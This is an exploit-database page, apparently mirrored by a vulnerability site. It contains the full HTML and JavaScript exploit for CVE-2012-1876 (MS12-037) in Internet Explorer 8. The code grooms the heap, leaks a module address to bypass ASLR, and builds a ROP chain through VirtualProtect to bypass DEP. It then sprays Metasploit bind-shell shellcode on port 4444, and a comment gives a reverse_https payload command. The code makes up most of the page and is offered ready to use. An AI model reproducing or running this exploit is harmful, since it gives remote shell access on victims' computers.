Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP Bypass) (MS12-037)

🗓️ 10 Jan 2013 00:00:00Reported by sicknessType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 82 Views

Internet Explorer 8 Fixed Col Span ID bypasses full ASLR & DEP using exploit CVE-2012-187

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Microsoft Internet Explorer Fixed Table Col Span Heap Overflow
2 Aug 201200:00
zdt
0day.today		Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass
10 Jan 201300:00
zdt
0day.today		Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.X Bypass
1 Jul 201400:00
zdt
0day.today		Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.1 Bypass (MS12-037)
18 Nov 201400:00
zdt
Circl		CVE-2012-1876
2 Aug 201200:00
circl
Check Point Advisories		Internet Explorer Col Element Remote Code Execution (MS12-037; CVE-2012-1876)
12 Jun 201200:00
checkpoint_advisories
CVE		CVE-2012-1876
12 Jun 201222:00
cve
Cvelist		CVE-2012-1876
12 Jun 201222:00
cvelist
Exploit DB		Microsoft Internet Explorer - Fixed Table Col Span Heap Overflow (MS12-037) (Metasploit)
2 Aug 201200:00
exploitdb
Exploit DB		Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 4.1.x Bypass) (MS12-037)
1 Jul 201400:00
exploitdb
Rows per page
<!--
** Exploit Title: Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass
** Author: [email protected]
** Thanks to Ryujin, Dookie and mr_me :) for their help.

####################################################################

** Affected Software: Internet Explorer 8
** Vulnerability: Fixed Col Span ID
** CVE: CVE-2012-1876
** Metasploit exploit using NON-ASLR DLL: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_037_ie_colspan.rb
** Vupen Blog post: http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php
** Tested on Windows 7 (x86) - IE 8.0.7601.17514
** Old version of the exploit available at: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24017-old.zip

####################################################################

** The exploit bypasses ASLR without the need of any NON-ASLR dll's using a leak :)
** To get it working on a different version of Windows you will require to make your own chances to the exploit :)
** Have fun :)
-->

<html>
<body>
<div id="evil"></div>
<table style="table-layout:fixed" ><col id="132" width="41" span="9" >  </col></table>
<script language='javascript'>

function strtoint(str) {
        return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
}

var free = "EEEE";
while ( free.length < 500 ) free += free;

var string1 = "AAAA";
while ( string1.length < 500 ) string1 += string1;

var string2 = "BBBB";
while ( string2.length < 500 ) string2 += string2;

var fr = new Array();
var al = new Array();
var bl = new Array();

var div_container = document.getElementById("evil");
div_container.style.cssText = "display:none";

for (var i=0; i < 500; i+=2) {
        fr[i] = free.substring(0, (0x100-6)/2);
        al[i] = string1.substring(0, (0x100-6)/2);
        bl[i] = string2.substring(0, (0x100-6)/2);
        var obj = document.createElement("button");
        div_container.appendChild(obj);
}

for (var i=200; i<500; i+=2 ) {
        fr[i] = null;
        CollectGarbage();
}

function heapspray(cbuttonlayout) {
    CollectGarbage();
    var rop = cbuttonlayout + 4161; // RET
    var rop = rop.toString(16);
    var rop1 = rop.substring(4,8);
    var rop2 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 11360; // POP EBP
    var rop = rop.toString(16);
    var rop3 = rop.substring(4,8);
    var rop4 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 111675; // XCHG EAX,ESP
    var rop = rop.toString(16);
    var rop5 = rop.substring(4,8);
    var rop6 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 12377; // POP EBX
    var rop = rop.toString(16);
    var rop7 = rop.substring(4,8);
    var rop8 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 642768; // POP EDX
    var rop = rop.toString(16);
    var rop9 = rop.substring(4,8);
    var rop10 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 12201; // POP ECX --> Changed
    var rop = rop.toString(16);
    var rop11 = rop.substring(4,8);
    var rop12 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 5504544; // Writable location
    var rop = rop.toString(16);
    var writable1 = rop.substring(4,8);
    var writable2 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 12462; // POP EDI
    var rop = rop.toString(16);
    var rop13 = rop.substring(4,8);
    var rop14 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 12043; // POP ESI --> changed
    var rop = rop.toString(16);
    var rop15 = rop.substring(4,8);
    var rop16 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 63776; // JMP EAX
    var rop = rop.toString(16);
    var jmpeax1 = rop.substring(4,8);
    var jmpeax2 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 85751; // POP EAX
    var rop = rop.toString(16);
    var rop17 = rop.substring(4,8);
    var rop18 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 4936; // VirtualProtect()
    var rop = rop.toString(16);
    var vp1 = rop.substring(4,8);
    var vp2 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]
    var rop = rop.toString(16);
    var rop19 = rop.substring(4,8);
    var rop20 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 234657; // PUSHAD
    var rop = rop.toString(16);
    var rop21 = rop.substring(4,8);
    var rop22 = rop.substring(0,4); // } RET


    var rop = cbuttonlayout + 408958; // PUSH ESP
    var rop = rop.toString(16);
    var rop23 = rop.substring(4,8);
    var rop24 = rop.substring(0,4); // } RET

    var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
    shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
    shellcode+= unescape("%u4141%u4141"); // PADDING

    shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN
    shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
    shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN

    // Standard DEP bypass
    shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
    shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
    shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP
    shellcode+= unescape("%u1024%u0000"); // Size 0x00001024
    shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX
    shellcode+= unescape("%u0040%u0000"); // 0x00000040
    shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX
    shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location
    shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI
    shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET
    shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI
    shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2); // JMP EAX
    shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX
    shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()
    shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]
    shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD
    shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP
    shellcode+= unescape("%u9090%u9090"); // NOPs
    shellcode+= unescape("%u9090%u9090"); // NOPs
    shellcode+= unescape("%u9090%u9090"); // NOPs

    // Bind shellcode on 4444 :)
    // msf > generate -t js_le
    // windows/shell_bind_tcp - 342 bytes
    // http://www.metasploit.com
    // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
    // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
    // I would keep the shellcode the same size for better reliability :) also would stay away from meterpreter/reverse_tcp
    // You can also generate as follows: msfpayload windows/meterpreter/reverse_https LHOST=192.168.12.13 LPORT=443 R | msfencode -a x86 -t js_le

    shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
                             "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
                             "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
                             "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
                             "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
                             "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
                             "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
                             "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
                             "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
                             "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
                             "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
                             "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
                             "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
                             "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
                             "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
                             "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
                             "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
                             "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
                             "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
                             "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
                             "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
                             "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
                             "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
                             "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
                             "%u006a%uff53%u41d5");

    // Total spray should be 1000
    var padding = unescape("%u9090");
    while (padding.length < 1000)
        padding = padding + padding;
    var padding = padding.substr(0, 1000 - shellcode.length);

    shellcode+= padding;

    while (shellcode.length < 100000)
        shellcode = shellcode + shellcode;

    var onemeg = shellcode.substr(0, 64*1024/2);

    for (i=0; i<14; i++) {
        onemeg += shellcode.substr(0, 64*1024/2);
    }

    onemeg += shellcode.substr(0, (64*1024/2)-(38/2));

    var spray = new Array();

    for (i=0; i<100; i++) {
        spray[i] = onemeg.substr(0, onemeg.length);
    }
}

function leak(){
        var leak_col = document.getElementById("132");
        leak_col.width = "41";
        leak_col.span = "19";
}

function get_leak() {
        var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));
        str_addr = str_addr - 1410704;
        var hex = str_addr.toString(16);
        //alert(hex);
        setTimeout(function(){heapspray(str_addr)}, 50);
}

function trigger_overflow(){
        var evil_col = document.getElementById("132");
        evil_col.width = "1245880";
        evil_col.span = "44";
}

setTimeout(function(){leak()}, 400);
setTimeout(function(){get_leak()},450);
setTimeout(function(){trigger_overflow()}, 700);

</script>
</body>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Jan 2013 00:00Current
6.9Medium risk
Vulners AI Score6.9
CVSS 29.3
EPSS0.87284
security exploitaslr bypassdep bypassinternet explorer 8cve-2012-1876
82